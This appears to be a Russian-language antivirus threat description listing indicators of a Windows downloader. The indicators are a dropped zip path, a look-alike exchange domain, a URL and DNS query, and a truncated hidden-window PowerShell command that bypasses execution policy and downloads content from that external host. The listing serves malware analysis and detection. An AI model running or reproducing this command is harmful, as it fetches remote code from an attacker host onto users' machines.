Техническая информация
- $nxodyqgbvjqxqybdzukwmvfdkorneac
- %APPDATA%\divx\p.zip
- 'pr####le-cex-io.com':80
- http://pr####le-cex-io.com/111.php?12#####
- DNS ASK pr####le-cex-io.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Ex Bypass -NoP -C $NxoDYQgBVjQXQYbdZukWMVfdkOrnEAC='http://profille-cex-io.com/111.php?1288459';$PWOuyMiLJvBwgLvFdXTyQTfbHwa=(New-Object System.Net.WebClient).DownloadString($NxoDYQgBVjQXQYbdZ...' (со скрытым окном)